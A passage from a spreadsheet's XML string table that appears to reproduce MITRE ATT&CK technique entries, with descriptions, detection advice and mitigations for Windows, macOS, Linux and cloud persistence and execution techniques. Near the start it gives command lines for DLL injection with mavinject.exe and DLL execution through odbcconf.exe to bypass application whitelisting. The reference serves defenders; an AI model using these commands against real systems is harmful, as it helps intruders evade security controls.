* &lt;code&gt;C:\Windows\system32\mavinject.exe &amp;lt;PID&amp;gt; /INJECTRUNNING &amp;lt;PATH DLL&amp;gt;&lt;/code&gt;
### SyncAppvPublishingServer.exe
SyncAppvPublishingServer.exe can be used to run PowerShell scripts without executing powershell.exe. (Citation: Twitter monoxgas Status Update SyncAppvPublishingServer)
### Odbcconf.exe
Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) The utility can be misused to execute functionality equivalent to [Regsvr32](https://attack.mitre.org/techniques/T1117) with the REGSVR option to execute a DLL.(Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017)
* &lt;code&gt;odbcconf.exe /S /A &amp;lbrace;REGSVR "C:\Users\Public\file.dll"&amp;rbrace;&lt;/code&gt;
Several other binaries exist that may be used to perform similar behavior. (Citation: GitHub Ultimate AppLocker Bypass List)</t>
  </si>
  <si>
    <t>Monitor processes and command-line parameters for signed binaries that may be used to proxy execution of malicious files. Legitimate programs used in suspicious ways, like msiexec.exe downloading an MSI file from the internet, may be indicative of an intrusion. Correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.</t>
  </si>
  <si>
    <t>Certain signed binaries that can be used to execute other programs may not be necessary within a given environment. Use application whitelisting configured to block execution of these binaries if they are not required for a given system or network to prevent potential misuse by adversaries. If these binaries are required for use, then restrict execution of them to privileged accounts or groups that need to use them to lessen the opportunities for malicious use.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Monitor script processes, such as cscript, and command-line parameters for scripts like PubPrn.vbs that may be used to proxy execution of malicious files.</t>
  </si>
  <si>
    <t>Certain signed scripts that can be used to execute other programs may not be necessary within a given environment. Use application whitelisting configured to block execution of these scripts if they are not required for a given system or network to prevent potential misuse by adversaries.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1216</t>
  </si>
  <si>
    <t>T1153</t>
  </si>
  <si>
    <t>Source</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</si>
  <si>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environment.(Citation: Source Manual)
Adversaries can abuse this functionality to execute programs. The file executed with this technique does not need to be marked executable beforehand.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</si>
  <si>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</si>
  <si>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Due to potential legitimate uses of source commands, it's may be difficult to mitigate use of this technique.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1153</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Prevent files from having a trailing space after the extension.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1151</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</si>
  <si>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</si>
  <si>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</si>
  <si>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systems installed within an enterprise network, such as administration, monitoring, and deployment systems as well as third-party gateways and jump servers used for managing other systems.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</si>
  <si>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</si>
  <si>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Evaluate the security of third-party software that could be used in the enterprise environment. Ensure that access to management systems for third-party systems is limited, monitored, and secure. Have a strict approval policy for use of third-party systems.
Grant access to Third-party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third-party systems are unique and not used throughout the enterprise network. Ensure that any accounts used by third-party providers to access these systems are traceable to the third-party and are not used throughout the network or used by other third-party providers in the same environment. Ensure third-party systems are regularly patched by users or the provider to prevent potential remote access through [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068). 
Ensure there are regular reviews of accounts provisioned to these systems to verify continued business need, and ensure there is governance to trace de-provisioning of access that is no longer required.
Where the third-party system is used for deployment services, ensure that it can be configured to deploy only signed binaries, then ensure that the trusted signing certificates are not co-located with the third-party system and are instead located on a system that cannot be accessed remotely or to which remote access is tightly controlled.</t>
  </si>
  <si>
    <t>File monitoring, Third-party application logs, Windows Registry, Process monitoring</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1072</t>
  </si>
  <si>
    <t>T1154</t>
  </si>
  <si>
    <t>Trap</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</si>
  <si>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received.(Citation: Trap Manual)(Citation: Cyberciti Trap Statements)</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</si>
  <si>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</si>
  <si>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Due to potential legitimate uses of trap commands, it's may be difficult to mitigate use of this technique.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1154</t>
  </si>
  <si>
    <t>T1127</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</si>
  <si>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</si>
  <si>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</si>
  <si>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MSBuild.exe, dnx.exe, rcsi.exe, WinDbg.exe, cdb.exe, and tracker.exe may not be necessary within a given environment and should be removed if not used.
Use application whitelisting configured to block execution of MSBuild.exe, dnx.exe, rcsi.exe, WinDbg.exe, and cdb.exe if they are not required for a given system or network to prevent potential misuse by adversaries. (Citation: Microsoft GitHub Device Guard CI Policies) (Citation: Exploit Monday Mitigate Device Guard Bypases) (Citation: GitHub mattifestation DeviceGuardBypass) (Citation: SubTee MSBuild)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1127</t>
  </si>
  <si>
    <t>T1204</t>
  </si>
  <si>
    <t>User Execution</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</si>
  <si>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Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl. 
As an example, an adversary may weaponize Windows Shortcut Files (.lnk) to bait a user into clicking to execute the malicious payload.(Citation: Proofpoint TA505 June 2018) A malicious .lnk file may contain [PowerShell](https://attack.mitre.org/techniques/T1086) commands. Payloads may be included into the .lnk file itself, or be downloaded from a remote server.(Citation: FireEye APT29 Nov 2018)(Citation: PWC Cloud Hopper Technical Annex April 2017) 
While User Execution frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it.</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</si>
  <si>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</si>
  <si>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Use user training as a way to bring awareness to common phishing and spearphishing techniques and how to raise suspicion for potentially malicious events. Application whitelisting may be able to prevent the running of executables masquerading as other files.
If a link is being visited by a user, block unknown or unused files in transit by default that should not be downloaded or by policy from suspicious sites as a best practice to prevent some vectors, such as .scr, .exe, .lnk, .pif, .cpl, etc. Some download scanning devices can open and analyze compressed and encrypted formats, such as zip and RAR that may be used to conceal malicious files in [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027).
If a link is being visited by a user, network intrusion prevention systems and systems designed to scan and remove malicious downloads can be used to block activity. Solutions can be signature and behavior based, but adversaries may construct files in a way to avoid these systems.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1204</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Disabling WMI or RPCS may cause system instability and should be evaluated to assess the impact to a network. By default, only administrators are allowed to connect remotely using WMI. Restrict other users who are allowed to connect, or disallow all users to connect remotely to WMI. Prevent credential overlap across systems of administrator and privileged accounts. (Citation: FireEye WMI 2015)</t>
  </si>
  <si>
    <t>Authentication logs, Netflow/Enclave netflow, Process monitoring, Process command-line parameters</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1047</t>
  </si>
  <si>
    <t>T1028</t>
  </si>
  <si>
    <t>Windows Remote Management</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</si>
  <si>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</si>
  <si>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(Citation: Medium Detecting Lateral Movement)</t>
  </si>
  <si>
    <t>Disable the WinRM service. If the service is necessary, lock down critical enclaves with separate WinRM infrastructure, accounts, and permissions. Follow WinRM best practices on configuration of authentication methods and use of host firewalls to restrict WinRM access to allow communication only to/from specific devices. (Citation: NSA Spotting)</t>
  </si>
  <si>
    <t>File monitoring, Authentication logs, Netflow/Enclave netflow, Process monitoring</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1028</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</si>
  <si>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</si>
  <si>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</si>
  <si>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[Regsvr32](https://attack.mitre.org/techniques/T1117)/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</si>
  <si>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</si>
  <si>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[Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and/or msxsl.exe may or may not be used within a given environment. Disabling WMI may cause system instability and should be evaluated to assess the impact to a network. If msxsl.exe is unnecessary, then block its execution to prevent abuse by adversaries.</t>
  </si>
  <si>
    <t>Process monitoring, Process command-line parameters, Process use of network, DLL monitoring</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1220</t>
  </si>
  <si>
    <t>TA0003</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/tactics/TA0003</t>
  </si>
  <si>
    <t>File monitoring, Process monitoring, Process command-line parameters, Process use of network</t>
  </si>
  <si>
    <t>T1015</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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 (Citation: TechNet RDP NLA)
If possible, use a Remote Desktop Gateway to manage connections and security configuration of RDP within a network. (Citation: TechNet RDP Gateway)
Identify and block potentially malicious software that may be executed by an adversary with this technique by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</t>
  </si>
  <si>
    <t>persistence, privilege-escalation</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1015</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
### Exchange Email Account Takeover
The Add-MailboxPermission PowerShell cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox.(Citation: Microsoft - Add-MailboxPermission) This command can be run, given adequate permissions, to further access granted to certain user accounts.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so the messages evade spam/phishing detection mechanisms.(Citation: Bienstock, D. - Defending O365 - 2019)
### Azure AD
In Azure, an adversary can set a second password for Service Principals, facilitating persistence.(Citation: Blue Cloud of Death)
### AWS
AWS policies allow trust between accounts by simply identifying the account name. It is then up to the trusted account to only allow the correct roles to have access.(Citation: Summit Route Advanced AWS policy auditing)</t>
  </si>
  <si>
    <t>Use multifactor authentication. Follow guidelines to prevent or limit adversary access to [Valid Accounts](https://attack.mitre.org/techniques/T1078).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</si>
  <si>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credential-access, persistence</t>
  </si>
  <si>
    <t>Authentication logs, API monitoring, Windows event logs, Packet capture</t>
  </si>
  <si>
    <t>Windows, Office 365</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1098</t>
  </si>
  <si>
    <t>T1182</t>
  </si>
  <si>
    <t>AppCert DLLs</t>
  </si>
  <si>
    <t>Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs Registry key under &lt;code&gt;HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager&lt;/code&gt; are loaded into every process that calls the ubiquitously used application programming interface (API) functions CreateProcess, CreateProcessAsUser, CreateProcessWithLoginW, CreateProcessWithTokenW, or WinExec. (Citation: Endgame Process Injection July 2017)
Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), this value can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer.</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</si>
  <si>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</si>
  <si>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Identify and block potentially malicious software that may be executed through AppCert DLLs by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown DLLs.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1182</t>
  </si>
  <si>
    <t>T1103</t>
  </si>
  <si>
    <t>AppInit DLLs</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Upgrade to Windows 8 or later and enable secure boot.
Identify and block potentially malicious software that may be executed through AppInit DLLs by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown DLLs.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1103</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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There currently aren't a lot of ways to mitigate application shimming. Disabling the Shim Engine isn't recommended because Windows depends on shimming for interoperability and software may become unstable or not work. Microsoft released an optional patch update - KB3045645 - that will remove the "auto-elevate" flag within the sdbinst.exe. This will prevent use of application shimming to bypass UAC. 
Changing UAC settings to "Always Notify" will give the user more visibility when UAC elevation is requested, however, this option will not be popular among users due to the constant UAC interruptions.</t>
  </si>
  <si>
    <t>Loaded DLLs, System calls, Windows Registry, Process monitoring</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1138</t>
  </si>
  <si>
    <t>T1131</t>
  </si>
  <si>
    <t>Authentication Package</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</si>
  <si>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</si>
  <si>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</si>
  <si>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8.1, Windows Server 2012 R2, and later versions, may make LSA run as a Protected Process Light (PPL) by setting the Registry key &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL&lt;/code&gt;, which requires all DLLs loaded by LSA to be signed by Microsoft. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1131</t>
  </si>
  <si>
    <t>T1197</t>
  </si>
  <si>
    <t>BITS Jobs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</si>
  <si>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</si>
  <si>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</si>
  <si>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This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of operating system design features. For example, disabling all BITS functionality will likely have unintended side effects, such as preventing legitimate software patching and updating. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identification of subsequent malicious behavior. (Citation: Mondok Windows PiggyBack BITS May 2007)
Modify network and/or host firewall rules, as well as other network controls, to only allow legitimate BITS traffic.
Consider limiting access to the BITS interface to specific users or groups. (Citation: Symantec BITS May 2007)
Consider reducing the default BITS job lifetime in Group Policy or by editing the &lt;code&gt;JobInactivityTimeout&lt;/code&gt; and &lt;code&gt;MaxDownloadTime&lt;/code&gt; Registry values in &lt;code&gt; HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\BITS&lt;/code&gt;. (Citation: Microsoft BITS)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1197</t>
  </si>
  <si>
    <t>T1067</t>
  </si>
  <si>
    <t>Bootkit</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</si>
  <si>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</si>
  <si>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Perform integrity checking on MBR and VBR. Take snapshots of MBR and VBR and compare against known good samples. Report changes to MBR and VBR as they occur for indicators of suspicious activity and further analysis.</t>
  </si>
  <si>
    <t>Ensure proper permissions are in place to help prevent adversary access to privileged accounts necessary to perform this action. Use Trusted Platform Module technology and a secure or trusted boot process to prevent system integrity from being compromised. (Citation: TCG Trusted Platform Module) (Citation: TechNet Secure Boot Process)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1067</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Only install browser extensions from trusted sources that can be verified. Ensure extensions that are installed are the intended ones as many malicious extensions will masquerade as legitimate ones.
Browser extensions for some browsers can be controlled through Group Policy. Set a browser extension white or black list as appropriate for your security policy. (Citation: Technospot Chrome Extensions GP)
Change settings to prevent the browser from installing extensions without sufficient permissions.
Close out all browser sessions when finished using them.</t>
  </si>
  <si>
    <t>Network protocol analysis, Packet capture, System calls, Process use of network</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1176</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Direct mitigation of this technique is not recommended since it is a legitimate function that can be performed by users for software preferences. Follow Microsoft's best practices for file associations. (Citation: MSDN File Associations)
Identify and block potentially malicious software that may be executed by this technique using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1042</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Prevent adversary access to privileged accounts or access necessary to perform this technique.
Consider removing and replacing system components suspected of being compromised.</t>
  </si>
  <si>
    <t>Disk forensics, API monitoring, Process monitoring, Component firmware</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1109</t>
  </si>
  <si>
    <t>T1122</t>
  </si>
  <si>
    <t>Component Object Model Hijacking</t>
  </si>
  <si>
    <t>The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</si>
  <si>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</si>
  <si>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Direct mitigation of this technique may not be recommended for a particular environment since COM objects are a legitimate part of the operating system and installed software. Blocking COM object changes may have unforeseen side effects to legitimate functionality.
Instead, identify and block potentially malicious software that may execute, or be executed by, this technique using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1122</t>
  </si>
  <si>
    <t>T1136</t>
  </si>
  <si>
    <t>Create Account</t>
  </si>
  <si>
    <t>Adversaries with a sufficient level of access may create a local system, domain, or cloud tenant account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.
In cloud environments, adversaries may create accounts that only have access to specific services, which can reduce the chance of detection.
### Windows
The &lt;code&gt;net user&lt;/code&gt; commands can be used to create a local or domain account.
### Office 365
An adversary with access to a Global Admin account can create another account and assign it the Global Admin role for persistent access to the Office 365 tenant.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)</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</si>
  <si>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</si>
  <si>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Use and enforce multifactor authentication. Follow guidelines to prevent or limit adversary access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) that may be used to create privileged accounts within an environment.
Adversaries that create local accounts on systems may have limited access within a network if access levels are properly locked down. These accounts may only be needed for persistence on individual systems and their usefulness depends on the utility of the system they reside on.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</si>
  <si>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Office 365 account logs, Azure activity logs, AWS CloudTrail logs, Process monitoring</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1136</t>
  </si>
  <si>
    <t>T1038</t>
  </si>
  <si>
    <t>DLL Search Order Hijacking</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Disallow loading of remote DLLs. (Citation: Microsoft DLL Preloading) This is included by default in Windows Server 2012+ and is available by patch for XP+ and Server 2003+. (Citation: Microsoft DLL Search) Path Algorithm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 (Citation: Microsoft DLL Search)
Use auditing tools capable of detecting DLL search order hijacking opportunities on systems within an enterprise and correct them. Toolkits like the PowerSploit framework contain PowerUp modules that can be used to explore systems for DLL hijacking weaknesses. (Citation: Powersploit)
Identify and block potentially malicious software that may be executed through search order hijacking by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown DLLs.</t>
  </si>
  <si>
    <t>File monitoring, DLL monitoring, Process monitoring, Process command-line parameters</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1038</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Prevent users from being able to write files to the search paths for applications, both in the folders where applications are run from and the standard dylib folders. If users can't write to these directories, then they can't intercept the search path.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1157</t>
  </si>
  <si>
    <t>T1519</t>
  </si>
  <si>
    <t>Emond</t>
  </si>
  <si>
    <t>Adversaries may use Event Monitor Daemon (emond) to establish persistence by scheduling malicious commands to run on predictable event triggers. Emond is a [Launch Daemon](https://attack.mitre.org/techniques/T1160)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Daemon](https://attack.mitre.org/techniques/T1160)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Daemon](https://attack.mitre.org/techniques/T1160) service.</t>
  </si>
  <si>
    <t>Monitor emond rules creation by checking for files created or modified in &lt;code&gt;/etc/emond.d/rules/&lt;/code&gt; and &lt;code&gt;/private/var/db/emondClients&lt;/code&gt;.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1519</t>
  </si>
  <si>
    <t>T1044</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Use auditing tools capable of detecting file system permissions abuse opportunities on systems within an enterprise and correct them. Limit privileges of user accounts and groups so that only authorized administrators can interact with service changes and service binary target path locations. Toolkits like the PowerSploit framework contain PowerUp modules that can be used to explore systems for service file system permissions weaknesses. (Citation: Powersploit)
Identify and block potentially malicious software that may be executed through abuse of file, directory, and service permissions by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown programs. Deny execution from user directories such as file download directories and temp directories where able. (Citation: Seclists Kanthak 7zip Installer)
Turn off UAC's privilege elevation for standard users &lt;code&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]&lt;/code&gt;to automatically deny elevation requests, add: &lt;code&gt;"ConsentPromptBehaviorUser"=dword:00000000&lt;/code&gt; (Citation: Seclists Kanthak 7zip Installer).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t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1044</t>
  </si>
  <si>
    <t>T1158</t>
  </si>
  <si>
    <t>Hidden Files and Directories</t>
  </si>
  <si>
    <t>Monitor the file system and shell commands for files being created with a leading "." and the Windows command-line use of attrib.exe to add the hidden attribute.</t>
  </si>
  <si>
    <t>Mitigation of this technique may be difficult and unadvised due to the the legitimate use of hidden files and directories.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1158</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of operating system design features. For example, mitigating all hooking will likely have unintended side effects, such as preventing legitimate software (i.e., security products) from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior.</t>
  </si>
  <si>
    <t>API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1179</t>
  </si>
  <si>
    <t>T1062</t>
  </si>
  <si>
    <t>Hypervisor</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Prevent adversary access to privileged accounts necessary to install a hypervisor.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1062</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of operating system design features. For example, mitigating all IFEO will likely have unintended side effects, such as preventing legitimate software (i.e., security products) from operating properly. (Citation: Microsoft IFEOorMalware July 2015) Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior.
Identify and block potentially malicious software that may be executed through IFEO by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown executables.</t>
  </si>
  <si>
    <t>privilege-escalation, persistence</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1183</t>
  </si>
  <si>
    <t>T1525</t>
  </si>
  <si>
    <t>Implant Container Image</t>
  </si>
  <si>
    <t xml:space="preserve">Amazon Web Service (AWS) Amazon Machine Images (AMI), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored to include malicious code.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shell.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019) Adversaries may also implant Docker images that may be inadvertently used in cloud deployments, which has been reported in some instances of cryptomining botnets.(Citation: ATT Cybersecurity Cryptocurrency Attacks on Cloud) </t>
  </si>
  <si>
    <t>Monitor interactions with images and containers by users to identify ones that are added or modified anomalously.</t>
  </si>
  <si>
    <t>GCP, Azure</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1525</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Programming)Â When used maliciously, Loadable Kernel Modules (LKMs) can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0). (Citation: Linux Kernel Module Programming Guide)Â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</si>
  <si>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properly.Â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</si>
  <si>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Common tools for detecting Linux rootkits include: rkhunter (Citation: SourceForge rkhunter), chrootkit (Citation: Chkrootkit Main), although rootkits may be designed to evade certain detection tools.
LKMs and Kernel extensions require root level permissions to be installed. Limit access to the root account and prevent users from loading kernel modules and extensions through proper privilege separation and limiting Privilege Escalation opportunities.
Application whitelisting and software restriction tools, such as SELinux, can also aide in restricting kernel module loading. (Citation: Kernel.org Restrict Kernel Module)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1215</t>
  </si>
  <si>
    <t>T1159</t>
  </si>
  <si>
    <t>Launch Agent</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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>Restrict user's abilities to create Launch Agents with group policy.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1159</t>
  </si>
  <si>
    <t>T1160</t>
  </si>
  <si>
    <t>Launch Daemon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</si>
  <si>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</si>
  <si>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Monitor Launch Daemon creation through additional plist files and utilities such as Objective-See's Knock Knock application.</t>
  </si>
  <si>
    <t>Limit privileges of user accounts and remediate Privilege Escalation vectors so only authorized administrators can create new Launch Daemons.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1160</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Enforce that all binaries be signed by the correct Apple Developer IDs, and whitelist applications via known hashes. Binaries can also be baselined for what dynamic libraries they require, and if an app requires a new dynamic library that wasn't included as part of an update, it should be investigated.</t>
  </si>
  <si>
    <t>Binary file metadata, Process monitoring, Process command-line parameters, File monitoring</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1161</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Restrict users from being able to create their own login items. Additionally, holding the shift key during login prevents apps from opening automatically (Citation: Re-Open windows on Mac).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1162</t>
  </si>
  <si>
    <t>T1037</t>
  </si>
  <si>
    <t>Logon Scripts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</si>
  <si>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</si>
  <si>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Monitor logon scripts for unusual access by abnormal users or at abnormal times. Look for files added or modified by unusual accounts outside of normal administration duties.</t>
  </si>
  <si>
    <t>Restrict write access to logon scripts to specific administrators. Prevent access to administrator accounts by mitigating Credential Access techniques and limiting account access and permissions of [Valid Accounts](https://attack.mitre.org/techniques/T1078).
Identify and block potentially malicious software that may be executed through logon script modification by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown programs.</t>
  </si>
  <si>
    <t>lateral-movement, persistence</t>
  </si>
  <si>
    <t>macOS, Windows</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1037</t>
  </si>
  <si>
    <t>T1031</t>
  </si>
  <si>
    <t>Modify Existing Service</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Use auditing tools capable of detecting privilege and service abuse opportunities on systems within an enterprise and correct them. Limit privileges of user accounts and groups so that only authorized administrators can interact with service changes and service configurations. Toolkits like the PowerSploit framework contain the PowerUp modules that can be used to explore systems for Privilege Escalation weaknesses. (Citation: Powersploit)
Identify and block potentially malicious software that may be executed through service abuse by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown programs.</t>
  </si>
  <si>
    <t>Windows Registry, File monitoring, Process monitoring, Process command-line parameters</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1031</t>
  </si>
  <si>
    <t>T1128</t>
  </si>
  <si>
    <t>Netsh Helper DLL</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Identify and block potentially malicious software that may persist in this manner by using whitelisting (Citation: Beechey 2010) tools capable of monitoring DLL loads by Windows utilities like AppLocker. (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1128</t>
  </si>
  <si>
    <t>T1050</t>
  </si>
  <si>
    <t>New Service</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Limit privileges of user accounts and remediate Privilege Escalation vectors so only  authorized administrators can create new services.
Identify and block unnecessary system utilities or potentially malicious software that may be used to create services by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</t>
  </si>
  <si>
    <t>Windows Registry, Process monitoring, Process command-line parameters, Windows event logs</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1050</t>
  </si>
  <si>
    <t>T1137</t>
  </si>
  <si>
    <t>Office Application Startup</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</si>
  <si>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templated, like Normal.dotm, should also be investigated since the base templates should likely not contain VBA macros. Changes to the Office macro security settings should also be investigated.(Citation: GlobalDotName Jun 2019)
Monitor and validate the Office trusted locations on the file system and audit the Registry entries relevant for enabling add-ins.(Citation: GlobalDotName Jun 2019)(Citation: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For the Outlook rules and forms methods,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</si>
  <si>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Follow Office macro security best practices suitable for your environment. Disable Office VBA macros from executing. Even setting to disable with notification could enable unsuspecting users to execute potentially malicious macros. (Citation: TechNet Office Macro Security)
For the Office Test method, create the Registry key used to execute it and set the permissions to "Read Control" to prevent easy access to the key without administrator permissions or requiring Privilege Escalation. (Citation: Palo Alto Office Test Sofacy)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
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t>
  </si>
  <si>
    <t>Process monitoring, Process command-line parameters, Windows Registry, File monitoring</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1137</t>
  </si>
  <si>
    <t>T1034</t>
  </si>
  <si>
    <t>Path Interception</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Eliminate path interception weaknesses in program configuration files, scripts, the PATH environment variable, services, and in shortcuts by surrounding PATH variables with quotation marks when functions allow for them (Citation: Microsoft CreateProcess). Be aware of the search order Windows uses for executing or loading binaries and use fully qualified paths wherever appropriate (Citation: MSDN DLL Security).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 (Citation: Kanthak Sentinel). 
Require that all executables be placed in write-protected directories.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Identify and block potentially malicious software that may be executed through the path interception by using whitelisting (Citation: Beechey 2010) tools, like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies, (Citation: Corio 2008) that are capable of auditing and/or blocking unknown executables.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1034</t>
  </si>
  <si>
    <t>T1150</t>
  </si>
  <si>
    <t>Plist Modification</t>
  </si>
  <si>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</si>
